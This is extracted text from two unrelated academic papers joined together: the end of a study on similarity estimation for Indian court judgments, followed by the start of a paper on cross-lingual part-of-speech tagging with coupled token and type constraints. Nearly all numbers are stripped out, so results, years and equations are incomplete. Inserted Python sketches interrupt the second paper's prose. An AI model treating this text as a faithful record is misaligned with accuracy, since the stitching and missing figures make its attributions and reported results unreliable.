i of the act states that the government may confirm the detention order if the advisory board gives an opinion to that effect.’ . ‘detenu’, ‘releas’, ‘mat- ter’, ’section ′, ‘right’, ‘action’ ‘if thereafter the advisory board will express an opinion in favour of release of the detenu the government will release the detenu.if the advisory board will express any opinion against the release of the detenu the government may still exercise the power to release the detenu. . if the appropriate government will release the detenu the government will not send the matter to the advisory board. . wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. naming conventions used for references that include special characters that need to be preserved. such information poses challenges in the pre-processing task and demands a domain-specific pre-processing which is important for deciding similarity. following pre-processing steps are used in our work (a) preserve numbers and special characters wherever significant by removing space between word and number. used for citation objects with numbers for example section converted to section , clause (a) converted to clause a. (b) use common nomenclature for citation objects(ipc <->indian penal code, constitu- tion of india <->indian constitution etc.).( guide to legal citation, ) (c) perform generic linguistic pre-processing of case conversion, english stop word removal stemming and lemmatization, punctuation and number removal. only numbers as words are removed i.e., section retained but a number removed. (d) remove legal stop words. some words (e.g., petitioner, petition, respondent, court, etc.) appear in almost every judgment. 
we construct legal stop word set forming a list of words having the highest frequency across all documents and remove these words from the documents. the set of , judgment documents pre-processed as above is used for training in the proposed work to obtain word embedding and tf-idf weights for words which are used for calculation of similarity. we used gensim package word vec library (gensim, ) for implementation. word vec function is trained on pre-processed judgment corpus. the function results in a vector representation of every word of the considered documents. we experimented with different vector dimensions for training word vec. best results were obtained for vector dimension which is used for all the experiments in this work. we used gensim tf-idf library (gensim, ) for obtaining tf-idf weights for the words in the document collection. experimental results and discussion similarity estimation for legal documents facilitates two primary operations in lir namely pairwise similarity estimation and extraction of relevant judgments from a collection of documents. the value of pairwise similarity obtained for a pair of docu- ments, can guide a user in establishing the parallel the between two documents whereas similarity of a document with all other documents can be used for ranked retrieval in lir. we evaluate our experiments of finding similarity among legal documents with the help of two different test approaches. we use binary classification for estimating pairwise similarity and information retrieval techniques to demonstrate the effectiveness of proposed approach in extraction of relevant documents. the following sub-sections elaborate these test approaches and the metrics used for the evaluation of the results. . pairwise similarity estimation—we use the proposed approach of similarity esti- mation using owa operator for finding similarity between a pair of case judgments. in the absence of test data for concept-wise similarity, we compare the results of our proposed approach with existing work for estimation of single similarity value for a judgment pair. we used the gold standard test dataset (kumar et al., ; mandal et wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. al., a; mandal et al., b) for this evaluation. the dataset contains relevance score given by human experts for pairs of judgments of the supreme court of india. for every pair, experts have given similarity ratings with values between – . finding similarity among case judgments using various approaches is presented in mandal et al. ( a), mandal et al. ( b) where authors have highlighted the superiority of results obtained using the document embedding approach, doc vec (le & mikolov, ). to evaluate the effectiveness of our proposed approach in identifying if a pair of judgment is similar or dissimilar, we use a simple binary classification approach. a judgment pair is labeled as similar if the obtained similarity value is greater than the chosen threshold value. we normalized expert scores to transform values in [ , ] range and experimented classification with different thresh- old values. though accuracy is the most commonly used measure of a classifier’s performance, it cannot differentiate between the number of correct labels of different classes. hence we use precision, recall and f-measure to evaluate the effectiveness of our proposed approach. 
in the context of the binary classification as mentioned above, precision represents the fraction of correctly classified documents among the retrieved documents within a class and is calculated using following equation (sokolova, japkowicz & szpakowicz, ). precision= true positive true positive+false positve recall is the fraction of relevant documents within a class that have been retrieved from the total number of relevant documents. recall can be calculated using the following equation. recall = true positive true positive+false negative f is defined as the weighted harmonic mean of the precision and recall and is computed using the following equation. f score= ∗ precision∗recall precision+recall precision, recall and f score together are used to evaluate classification effec- tiveness. figure shows the results of binary classification obtained for various threshold values. we compare our results with the existing prior work (mandal et al., a; mandal et al., b) for finding similarity among legal judgments. thus doc vec in the fig. and table represent pairwise similarity estimation using document embedding scheme reported by mandal et al., ( a); mandal et al., ( b). table presents the comparison of the results. we have included only the best case results for the experimented approaches. as described in the previous subsections, we use two vector representations namely word vec and word vec with idf for every word in the representative sentences for each concept. as it can be seen wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from table , our proposed approach gives results comparable with the existing approach of document embedding. it can be seen form the results that combining idf, the inverted document frequency with the word vectors results into better f score of . for pairwise similarity estimation. it is also to be noted that the overall f score of . obtained by using only word vec is comparable with existing approach. to evaluate the effectiveness of our proposed approach, we also performed pairwise t test of statistical significance on the f scores obtained for individual cases in the test dataset. the test resulted into a confidence score of % when compared with existing approach. . extraction of relevant judgments from a collection of documents—we use the proposed approach of similarity estimation for extraction of relevant judgments from a collection of judgment corpus. we use ranked information retrieval technique to evaluate the effectiveness of our approach. a judgment contains references (citations) to multiple cases for justifying the validity of arguments and decisions during the proceedings of a case. these cited cases are called as precedents and are considered to have very high relevance with the citing case. for this evaluation, we construct test data as follows • a query set, q is constructed by hiding all the references to precedents present in the text of the judgment. we use |q|= • a document corpus, dc, which, along with many other judgments contains precedents i.e., the judgments cited by judgments in the query set q. dc is used as a document base for extraction of relevant judgments. we use |dc|= . 
in the context of information retrieval, precision and recall are estimated differently than that of the classification approach and can be explained using following equa- tions: precision= |{retrieved document}∩{relevant document}| |{retrieveddocuments}| recall = |{retrieved document}∩{relevant document}| |{relevantdocuments}| . in a ranked information retrieval system, precision and recall values calculated at given cut-off k, i.e., precision@k and recall@k are used as evaluation metrics (manning, raghavan & schütze, ). precision recall values can be plotted to obtain precision recall curves which provide visual exploration of retrieved results at different levels of precision and recall. interpolating precision to next higher recall is a common practice to obtain a smoother precision recall curve (manning, raghavan & schütze, ). figure shows sample precision recall curves obtained for a query. when cut off is taken at r, the known number of relevant documents in the corpus, it is called as r-precision which is used extensively for evaluation of results in ranked retrieval systems. we use precision@k, r-precision and recall@k for the evaluation of the results of our proposed approach. results obtained for different values of k are wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure precision, recall and f score for different threshold values. (a) precision, recall and f score for threshold value≥ . . (b) precision, recall and f score for threshold value≥mean of obtained sim- ilarity values. (c) precision, recall and f score for threshold value > . (d) precision, recall and f score for threshold value≥ . ′. full-size doi: . /peerjcs. /fig- summarized in table . we compare the results with previous work on the extraction of relevant judgments of the supreme court of india (mandal et al., a; mandal et al., b). in this work best performance of retrieval is obtained by considering only the citation context, i.e., the paragraph around the case citation in a judgment and then applying inverted document frequency, idf for estimation of similarity. as it can be seen from the results presented in table , our proposed approach clearly outperforms the existing work. we obtain the best result of . for r-precision which highlights the effectiveness of the proposed result for ranked retrieval of judgments. the proposed approach also results in higher values of recall for a smaller cut of value, k = ascertaining its efficacy in retrieving relevant judgments within a document collection. wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table pairwise similarity estimation. approach precision recall f score word vec using owa . . . word vec idf weighted using owa . . . doc vec . . . figure sample precision recall plot obtained at rank . full-size doi: . /peerjcs. /fig- conclusions establishing relevance among legal documents is a very complex task and demands specialized approaches to similarity estimation. in this paper, we presented a novel approach of extracting prominent concepts from the document for finding the similarity among legal judgments. we presented legal document similarity estimation as a multi- criteria decision-making problem which we solved using aggregation operator owa. 
in addition to the improvement in the results, the proposed approach provides multiple levels of similarities which facilitates visualization and can be useful for deeper insights into the notion of relevance among court judgments. the presented approach is entirely data-driven as the concepts to be matched are extracted intrinsically and there is no need for the user to formulate a query. the proposed approach also extracts sentences specific to every concept and set of these sentences can be used as a condensed representation for the judgment document. the proposed approach used common nouns to identify basic concept words. in future, we would like to use more sophisticated methods like named entities and entity co-references for identification of concepts. community detection wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table extraction of relevant judgments: ranked information retrieval. proposed approach existing work method used precision @ precision @r recall @ recall @ recall @ method used precision @ recall @ word vec . . . . . idf, citation context . . parsimonious language model, citationcontext . . word vec with idf weight . . . . . citation context . . dirichlet prior smoothing . . algorithms based on centrality and between-ness can be explored for the identification of prominent communities. we would like to explore the possibility of introducing the concept weighting scheme based on the importance of a concept in various sub-domains of law for a deeper understanding of relevance. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • rupali s. wagh and deepa anand conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the data is available at figshare: wagh, rupali ( ): document corpus of court case judgments. figshare. dataset. https://doi.org/ . /m .figshare. .v . references bench-capon t, bench-capon t, araszkiewicz m, ashley k, atkinson k, bex f, borges f, bourcier d, bourgine p, conrad jg, francesconi e, gordon tf, governatori g, leidner jl, lewis dd, loui rp, mccarty lt, prakken h, schilder f, schweighofer e, thompson p, tyrrell a, verheij b, walton dn, wyner az. . a history of ai and law in papers: years of the international conference on ai and law. artificial intelligence and law ( ): – doi . /s - - -x. branting lk. . data-centric and logic-based models for automated legal problem solving. artificial intelligence and law ( ): – doi . /s - - -x. wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /peerj-cs. carlsson c, fullér r. . compound interdependences in mop. in: proceedings of the fourth european congress on intelligent techniques and soft computing (eufit’ ). casanovas p, casanovas p, palmirani m, peroni s, van engers t, vitali f. . semantic web for the legal domain: the next step. semantic web ( ): – doi . /sw- . community detection for networkx’s documentation. . 
available at https:// python-louvain.readthedocs.io/en/latest/ (accessed on march ). cui p, wang x, pei j, zhu w. . a survey on network embedding. ieee transactions on knowledge and data engineering ( ): – . de meo p. . generalized louvain method for community detection in large networks. in: th international conference on intelligent systems design and applications. gensim. . models.word vec word vec embedding. available at https:// radimrehurek.com/gensim/models/word vec.html (accessed on february ). goyal p, ferrara e. . graph embedding techniques, applications, and performance: a survey. knowledge-based systems : – doi . /j.knosys. . . . grover a, leskovec j. . node vec: scalable feature learning for networks. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining. acm. koniaris m, anagnostopoulos i, vassiliou y. . network analysis in the legal domain: a complex model for european union legal sources. journal of complex networks ( ): – . kumar s, reddy pk, reddy vb, suri m. . finding similar legal judgements under common law system. in: international workshop on databases in networked informa- tion systems. berlin, heidelberg: springer. lau jh, baldwin t. . an empirical evaluation of doc vec with practical insights into document embedding generation. arxiv preprint. arxiv: . . le q, mikolov t. . distributed representations of sentences and documents. in: international conference on machine learning. liu b, niu d, wei h, lin j, he y, lai k, y xu. . matching long text documents via graph convolutional networks. arxiv preprint. arxiv:arxiv: . . mandal a, mandal a, chaki r, saha s, ghosh k, pal a, ghosh s. a. measuring similarity among legal court case documents. in: proceedings of the th annual acm india compute conference. acm. mandal a, ghosh k, bhattacharya a, pal a, ghosh s. b. overview of the fire irled track: information retrieval from legal documents. fire (working notes). – . manning c, raghavan p, schütze h. . introduction to information retrieval. natural language engineering ( ): – doi . /s . mikolov t, chen k, corrado g, dean j. . efficient estimation of word representa- tions in vector space. arxiv preprint. arxiv: . . moody ce. . mixing dirichlet topic models and word embeddings to make lda vec. arxiv preprint. arxiv: . . wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /sw- https://python-louvain.readthedocs.io/en/latest/ https://python-louvain.readthedocs.io/en/latest/ https://radimrehurek.com/gensim/models/word vec.html https://radimrehurek.com/gensim/models/word vec.html http://dx.doi.org/ . /j.knosys. . . http://arxiv.org/abs/ . http://arxiv.org/abs/arxiv: . http://dx.doi.org/ . /s http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. nair am, wagh rs. similarity analysis of court judgements using association rule mining on case citation data. onal kd, zhang y, altingovde is, rahman mm, karagoz p, brayla a, dang b, chang h-l, kim h, mcnamara q, angert a, banner e, khetan v, mcdonnell t, nguyen at, xu d, bc wallace, de rijke m, lease m. . neural information retrieval: at the end of the early years. information retrieval journal ( – ): – doi . /s - - -y. ramos j. . using tf-idf to determine word relevance in document queries. in: proceedings of the first instructional conference on machine learning. . saravanan m, ravindran b, raman s. . improving legal information retrieval using an ontological framework. artificial intelligence and law ( ): – doi . 
/s - - -y. sayyadi h, raschid l. . a graph analytical approach for topic detection. acm transactions on internet technology (toit) ( ): – . sokolova m, japkowicz n, szpakowicz s. . beyond accuracy, f-score and roc: a family of discriminant measures for performance evaluation. in: australasian joint conference on artificial intelligence. berlin: springer. sugathadasa k, ayesha b, de silva n, perera as, jayawardana v, lakmal d, perera m. . legal document retrieval using document vector embeddings and deep learning. in: science and information conference. cham: springer. van opijnen m. . citation analysis and beyond: in search of indicators measuring case law importance. in: jurix. .. vo npa, privault c, guillot f. . experimenting word embeddings in assisting legal review. in: proceedings of the th edition of the international conference on articial intelligence and law. acm. wagh rs, anand d. . application of citation network analysis for improved simi- larity index estimation of legal case documents: a study. in: ieee international conference on current trends in advanced computing (icctac). – . yager rr. . fuzzy logic methods in recommender systems. fuzzy sets and systems ( ): – doi . /s - ( ) - . ying y, qingping t, qinzheng x, ping z, panpan l. . a graph-based approach of automatic keyphrase extraction. procedia computer science : – doi . /j.procs. . . . wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /peerj-cs. transactions of the association for computational linguistics, ( ) – . action editor: sharon goldwater. submitted / ; revised / ; published / . c© association for computational linguistics. token and type constraints for cross-lingual part-of-speech tagging oscar täckström�†∗ dipanjan das‡ slav petrov‡ ryan mcdonald‡ joakim nivre†∗ � swedish institute of computer science † department of linguistics and philology, uppsala university ‡ google research, new york oscar@sics.se {dipanjand|slav|ryanmcd}@google.com joakim.nivre@lingfil.uu.se abstract we consider the construction of part-of-speech taggers for resource-poor languages. recently, manually constructed tag dictionaries from wiktionary and dictionaries projected via bitext have been used as type constraints to overcome the scarcity of annotated data in this setting. in this paper, we show that additional token constraints can be projected from a resource- rich source language to a resource-poor target language via word-aligned bitext. we present several models to this end; in particular a par- tially observed conditional random field model, where coupled token and type constraints pro- vide a partial signal for training. averaged across eight previously studied indo-european languages, our model achieves a % relative error reduction over the prior state of the art. we further present successful results on seven additional languages from different families, empirically demonstrating the applicability of coupled token and type constraints across a diverse set of languages. introduction supervised part-of-speech (pos) taggers are avail- able for more than twenty languages and achieve ac- curacies of around % on in-domain data (petrov et al., ). 
thanks to their efficiency and robustness, supervised taggers are routinely employed in many natural language processing applications, such as syn- tactic and semantic parsing, named-entity recognition and machine translation. unfortunately, the resources required to train supervised taggers are expensive to create and unlikely to exist for the majority of written ∗work primarily carried out while at google research. languages. the necessity of building nlp tools for these resource-poor languages has been part of the motivation for research on unsupervised learning of pos taggers (christodoulopoulos et al., ). in this paper, we instead take a weakly supervised approach towards this problem. recently, learning pos taggers with type-level tag dictionary constraints has gained popularity. tag dictionaries, noisily pro- jected via word-aligned bitext, have bridged the gap between purely unsupervised and fully supervised taggers, resulting in an average accuracy of over % on a benchmark of eight indo-european languages (das and petrov, ). li et al. ( ) further im- proved upon this result by employing wiktionary as a tag dictionary source, resulting in the hitherto best published result of almost % on the same setup. although the aforementioned weakly supervised approaches have resulted in significant improvements over fully unsupervised approaches, they have not exploited the benefits of token-level cross-lingual projection methods, which are possible with word- aligned bitext between a target language of interest and a resource-rich source language, such as english. this is the setting we consider in this paper (§ ). while prior work has successfully considered both token- and type-level projection across word-aligned bitext for estimating the model parameters of genera- tive tagging models (yarowsky and ngai, ; xi and hwa, , inter alia), a key observation under- lying the present work is that token- and type-level information offer different and complementary sig- nals. on the one hand, high confidence token-level projections offer precise constraints on a tag in a particular context. on the other hand, manually cre- http://www.wiktionary.org/. ated type-level dictionaries can have broad coverage and do not suffer from word-alignment errors; they can therefore be used to filter systematic as well as random noise in token-level projections. in order to reap these potential benefits, we pro- pose a partially observed conditional random field (crf) model (lafferty et al., ) that couples to- ken and type constraints in order to guide learning (§ ). in essence, the model is given the freedom to push probability mass towards hypotheses consistent with both types of information. this approach is flex- ible: we can use either noisy projected or manually constructed dictionaries to generate type constraints; furthermore, we can incorporate arbitrary features over the input. in addition to standard (contextual) lexical features and transition features, we observe that adding features from a monolingual word cluster- ing (uszkoreit and brants, ) can significantly im- prove accuracy. while most of these features can also be used in a generative feature-based hidden markov model (hmm) (berg-kirkpatrick et al., ), we achieve the best accuracy with a globally normalized discriminative crf model. 
to evaluate our approach, we present extensive results on standard publicly available datasets for languages: the eight indo-european languages pre- viously studied in this context by das and petrov ( ) and li et al. ( ), and seven additional lan- guages from different families, for which no compa- rable study exists. in § we compare various features, constraints and model types. our best model uses type constraints derived from wiktionary, together with token constraints derived from high-confidence word alignments. when averaged across the eight languages studied by das and petrov ( ) and li et al. ( ), we achieve an accuracy of . %. this is a % relative error reduction over the previous state of the art. averaged across all languages, our model obtains an accuracy of . % compared to . % obtained by a strong generative baseline. fi- nally, we provide an in depth analysis of the relative contributions of the two types of constraints in § . coupling token and type constraints type-level information has been amply used in weakly supervised pos induction, either via pure manually crafted tag dictionaries (smith and eisner, ; ravi and knight, ; garrette and baldridge, ), noisily projected tag dictionaries (das and petrov, ) or through crowdsourced lexica, such as wiktionary (li et al., ). at the other end of the spectrum, there have been efforts that project token-level information across word-aligned bitext (yarowsky and ngai, ; xi and hwa, ). how- ever, systems that combine both sources of informa- tion in a single model have yet to be fully explored. the following three subsections outline our overall approach for coupling these two types of information to build robust pos taggers that do not require any direct supervision in the target language. . token constraints for the majority of resource-poor languages, there is at least some bitext with a resource-rich source language; for simplicity, we choose english as our source language in all experiments. it is then nat- ural to consider using a supervised part-of-speech tagger to predict part-of-speech tags for the english side of the bitext. these predicted tags can subse- quently be projected to the target side via automatic word alignments. this approach was pioneered by yarowsky and ngai ( ), who used the resulting partial target annotation to estimate the parameters of an hmm. however, due to the automatic nature of the word alignments and the pos tags, there will be significant noise in the projected tags. to conquer this noise, they used very aggressive smoothing tech- niques when training the hmm. fossum and abney ( ) used similar token-level projections, but in- stead combined projections from multiple source lan- guages to filter out random projection noise as well as the systematic noise arising from different source language annotations and syntactic divergences. . type constraints it is well known that given a tag dictionary, even if it is incomplete, it is possible to learn accurate pos taggers (smith and eisner, ; goldberg et al., ; ravi and knight, ; naseem et al., ). while widely differing in the specific model struc- ture and learning objective, all of these approaches achieve excellent results. unfortunately, they rely on tag dictionaries extracted directly from the un- derlying treebank data. 
such dictionaries provide in depth coverage of the test domain and also list all inflected forms – both of which are difficult to obtain and unrealistic to expect for resource-poor languages. [figure : lattice representation of the inference search space y(x) for an authentic sentence in swedish ("the farming products must be pure and must not contain any additives"), after pruning with wiktionary type constraints. the correct parts of speech are listed underneath each word. bold nodes show projected token constraints ỹ. underlined text indicates incorrect tags. the coupled constraints lattice ŷ(x,ỹ) consists of the bold nodes together with nodes for words that are lacking token constraints; in this case, the coupled constraints lattice thus defines exactly one valid path.] in contrast, das and petrov ( ) automatically create type-level tag dictionaries by aggregating over projected token-level information extracted from bitext. to handle the noise in these automatic dictionaries, they use label propagation on a similarity graph to smooth (and also expand) the label distributions. while their approach produces good results and is applicable to resource-poor languages, it requires a complex multi-stage training procedure including the construction of a large distributional similarity graph. recently, li et al. ( ) presented a simple and viable alternative: crowdsourced dictionaries from wiktionary. while noisy and sparse in nature, wiktionary dictionaries are available for languages (http://meta.wikimedia.org/wiki/wiktionary — october ). furthermore, their quality and coverage is growing continuously (li et al., ). by incorporating type constraints from wiktionary into the feature-based hmm of berg-kirkpatrick et al. ( ), li et al. were able to obtain the best published results in this setting, surpassing the results of das and petrov ( ) on eight indo-european languages. . coupled constraints rather than relying exclusively on either token or type constraints, we propose to complement the one with the other during training. for each sentence in our training set, a partially constrained lattice of tag sequences is constructed as follows: 1. for each token whose type is not in the tag dictionary, we allow the entire tag set. 2. for each token whose type is in the tag dictionary, we prune all tags not licensed by the dictionary and mark the token as dictionary-pruned. 3. for each token that has a tag projected via a high-confidence bidirectional word alignment: if the projected tag is still present in the lattice, then we prune every tag but the projected tag for that token; if the projected tag is not present in the lattice, which can only happen for dictionary-pruned tokens, then we ignore the projected tag. figure provides a running example. the lattice shows tags permitted after constraining the words to tags licensed by the dictionary (up until step 2 from above). there is only a single token "jordbruksprodukterna" ("the farming products") not in the dictionary; in this case the lattice permits the full set of tags. with token-level projections (step 3; nodes with bold border in figure ), the lattice can be further pruned. in most cases, the projected tag is both correct and is in the dictionary-pruned lattice.
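The lattice construction in steps 1-3 above is mechanical enough to sketch directly. The snippet below is a minimal illustration, not the authors' implementation; the universal tag set, the dictionary entries, and the per-token projected tags are made-up placeholders assumed only for this example.

```python
# Sketch of the coupled token- and type-constrained lattice (steps 1-3 above).
# `dictionary` maps a word type to its licensed tags, `projected` maps a token
# index to a high-confidence projected tag; both are hypothetical inputs.

UNIVERSAL_TAGS = {"NOUN", "VERB", "ADJ", "ADV", "PRON", "DET",
                  "ADP", "NUM", "CONJ", "PRT", "X", "."}

def coupled_lattice(tokens, dictionary, projected, tagset=UNIVERSAL_TAGS):
    lattice = []
    for i, word in enumerate(tokens):
        if word in dictionary:              # step 2: dictionary-pruned token
            allowed = set(dictionary[word])
        else:                               # step 1: type not in dictionary
            allowed = set(tagset)
        proj = projected.get(i)             # step 3: projected token constraint
        if proj is not None and proj in allowed:
            allowed = {proj}                # keep only the projected tag
        # a projected tag not licensed by the dictionary is simply ignored
        lattice.append(allowed)
    return lattice

# Toy usage with invented entries.
tokens = ["jordbruksprodukterna", "skall", "vara", "rena"]
dictionary = {"vara": {"VERB", "NOUN"}, "rena": {"ADJ"}}
projected = {0: "ADJ", 2: "VERB"}
print(coupled_lattice(tokens, dictionary, projected))
```

With these toy inputs the out-of-dictionary first token is collapsed to its projected tag, mirroring the failure case discussed next, while the third token is disambiguated to the single tag licensed by both sources.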
we thus successfully disambiguate such tokens and shrink the search space substantially. there are two cases we highlight in order to show where our model can break. first, for the token "jordbruksprodukterna", the erroneously projected tag adj will eliminate all other tags from the lattice, including the correct tag noun. second, the token "några" ("any") has a single dictionary entry pron and is missing the correct tag det. in the case where det is the projected tag, we will not add it to the lattice and simply ignore it. this is because we hypothesize that the tag dictionary can be trusted more than the tags projected via noisy word alignments. as we will see in § , taking the union of tags performs worse, which supports this hypothesis. for generative models, such as hmms (§ . ), we need to define only one lattice. for our best generative model this is the coupled token- and type-constrained lattice. at prediction time, in both the discriminative and the generative cases, we find the most likely label sequence using viterbi decoding. for discriminative models, such as crfs (§ . ), we need to define two lattices: one that the model moves probability mass towards and another one defining the overall search space (or partition function). in traditional supervised learning without a dictionary, the former is a trivial lattice containing the gold standard tag sequence and the latter is the set of all possible tag sequences spanning the tokens. with our best model, we will move mass towards the coupled token- and type-constrained lattice, such that the model can freely distribute mass across all paths consistent with these constraints. the lattice defining the partition function will be the full set of possible tag sequences when no dictionary is used; when a dictionary is used it will consist of all dictionary-pruned tag sequences (sans step 3 above; the full set of possibilities shown in figure for our running example). figures and provide statistics regarding the supervision coverage and remaining ambiguity. figure shows that more than two thirds of all tokens in our training data are in wiktionary. however, there is considerable variation between languages: spanish has the highest coverage with over %, while turkish, an agglutinative language with a vast number of word forms, has less than % coverage. figure shows that there is substantial uncertainty left after pruning with wiktionary, since tokens are rarely fully disambiguated: . tags per token are allowed on average for types in wiktionary. figure further shows that high-confidence alignments are available for about half of the tokens for most languages (japanese is a notable exception with less than % of the tokens covered). (other training methods exist as well, for example, contrastive estimation (smith and eisner, ).) [figure : wiktionary and projection dictionary coverage. shown is the percentage of tokens in the target side of the bitext that are covered by wiktionary, that have a projected tag, and that have a projected tag after intersecting the two.] [figure : average number of licensed tags per token on the target side of the bitext, for types in wiktionary.]
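The coverage and ambiguity statistics summarized in the two figure captions above can be reproduced with simple bookkeeping over the target side of the bitext. The sketch below assumes tokenized sentences, a type-level dictionary, and per-token projections as hypothetical inputs; it is illustrative only and not tied to the datasets used here.

```python
# Sketch of supervision-coverage statistics: share of tokens whose type is in
# the dictionary, share of tokens with a projected tag, and the mean number of
# licensed tags per dictionary-covered token. All inputs are placeholders.

def coverage_stats(sentences, dictionary, projections):
    total = covered = projected = licensed = 0
    for sent, proj in zip(sentences, projections):
        for i, word in enumerate(sent):
            total += 1
            if word in dictionary:
                covered += 1
                licensed += len(dictionary[word])
            if proj.get(i) is not None:
                projected += 1
    return {
        "dictionary_coverage": covered / total,
        "projection_coverage": projected / total,
        "tags_per_covered_token": licensed / max(covered, 1),
    }

sentences = [["the", "farming", "products"], ["must", "be", "pure"]]
dictionary = {"the": {"DET"}, "be": {"VERB"}, "pure": {"ADJ", "NOUN"}}
projections = [{0: "DET", 2: "NOUN"}, {1: "VERB"}]
print(coverage_stats(sentences, dictionary, projections))
```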
intersecting the wiktionary tags and the projected tags (step and above) filters out some of the potentially erroneous tags, but preserves the majority of the projected tags; the remaining, presumably more accurate projected tags cover almost half of all tokens, greatly reducing the search space that the learner needs to explore. models with coupled constraints we now formally present how we couple token and type constraints and how we use these coupled con- straints to train probabilistic tagging models. let x = (x x . . .x|x|) ∈ x denote a sentence, where each token xi ∈v is an instance of a word type from the vocabulary v and let y = (y y . . .y|x|) ∈ y de- note a tag sequence, where yi ∈t is the tag assigned to token xi and t denotes the set of all possible part- of-speech tags. we denote the lattice of all admissible tag sequences for the sentence x by y(x). this is the inference search space in which the tagger operates. as we shall see, it is crucial to constrain the size of this lattice in order to simplify learning when only incomplete supervision is available. a tag dictionary maps a word type xj ∈ v to a set of admissible tags t (xj) ⊆ t . for word types not in the dictionary we allow the full set of tags t (while possible, in this paper we do not at- tempt to distinguish closed-class versus open-class words). when provided with a tag dictionary, the lattice of admissible tag sequences for a sentence x is y(x) = t (x ) ×t (x ) × . . .×t (x|x|). when no tag dictionary is available, we simply have the full lattice y(x) = t |x|. let ỹ = (ỹ ỹ . . . ỹ|x|) be the projected tags for the sentence x. note that {ỹi} = ∅ for tokens without a projected tag. next, we define a piecewise operator _ that couples ỹ and y(x) with respect to every sentence index, which results in a token- and type- constrained lattice. the operator behaves as follows, coherent with the high level description in § . : t̂ (xi, ỹi) = ỹi _ t (xi) = { {ỹi} if ỹi ∈t (xi) t (xi) otherwise . we denote the token- and type-constrained lattice as ŷ(x,ỹ) = t̂ (x , ỹ )×t̂ (x , ỹ )×. . .×t̂ (x|x|, ỹ|x|). note that when token-level projections are not used, the dictionary-pruned lattice and the lattice with cou- pled constraints are identical, that is ŷ(x,ỹ) = y(x). . hmms with coupled constraints a first-order hidden markov model (hmm) specifies the joint distribution of a sentence x ∈ x and a tag-sequence y ∈y(x) as: pβ(x,y) = |x|∏ i= pβ(xi | yi)︸ ︷︷ ︸ emission pβ(yi | yi− )︸ ︷︷ ︸ transition . we follow the recent trend of using a log-linear parametrization of the emission and the transition distributions, instead of a multinomial parametriza- tion (chen, ). this allows model parameters β to be shared across categorical events, which has been shown to give superior performance (berg- kirkpatrick et al., ). the categorical emission and transition events are represented by feature vec- tors φ(xi,yi) and φ(yi,yi− ). each element of the parameter vector β corresponds to a particular fea- ture; the component log-linear distributions are: pβ(xi | yi) = exp ( β>φ(xi,yi) ) ∑ x′i∈v exp (β>φ(x′i,yi)) , and pβ(yi | yi− ) = exp ( β>φ(yi,yi− ) ) ∑ y′i∈t exp (β>φ(y′i,yi− )) . in maximum-likelihood estimation of the parameters, we seek to maximize the likelihood of the observed parts of the data. for this we need the joint marginal distribution pβ(x,ŷ(x,ỹ)) of a sentence x, and its coupled constraints lattice ŷ(x,ỹ), which is obtained by marginalizing over all consistent outputs: pβ(x,ŷ(x,ỹ)) = ∑ y∈ŷ(x,ỹ) pβ(x,y) . 
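The marginal pβ(x, Ŷ(x, ỹ)) above sums the joint probability of every tag path that the coupled lattice allows, which can be computed exactly with a forward pass. The sketch below is a simplified log-space illustration under assumed inputs (pre-computed per-position emission scores, transition scores, and start scores passed in as dictionaries); it is not the authors' code and ignores the feature-based parametrization for brevity.

```python
import math

# Forward algorithm over a constrained lattice: returns the log of the summed
# joint probability of all allowed tag paths. `lattice[i]` is the set of tags
# allowed at position i; `emis`, `trans`, and `start` hold log-scores and are
# hypothetical inputs for the example.

def log_sum_exp(values):
    m = max(values)
    return m + math.log(sum(math.exp(v - m) for v in values))

def log_marginal(lattice, emis, trans, start):
    alpha = {t: start[t] + emis[(0, t)] for t in lattice[0]}
    for i in range(1, len(lattice)):
        alpha = {
            t: log_sum_exp([alpha[tp] + trans[(tp, t)] for tp in lattice[i - 1]])
               + emis[(i, t)]
            for t in lattice[i]
        }
    return log_sum_exp(list(alpha.values()))

# Toy two-token lattice: the first token is fully constrained, the second is
# ambiguous between two tags.
lattice = [{"DET"}, {"NOUN", "VERB"}]
emis = {(0, "DET"): -0.1, (1, "NOUN"): -0.5, (1, "VERB"): -1.2}
trans = {("DET", "NOUN"): -0.2, ("DET", "VERB"): -1.6}
start = {"DET": -0.05}
print(log_marginal(lattice, emis, trans, start))
```

Training pushes probability mass toward the paths inside the coupled lattice while the partition function is computed over the larger dictionary-pruned lattice, so the same routine can be reused with the two different lattices.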
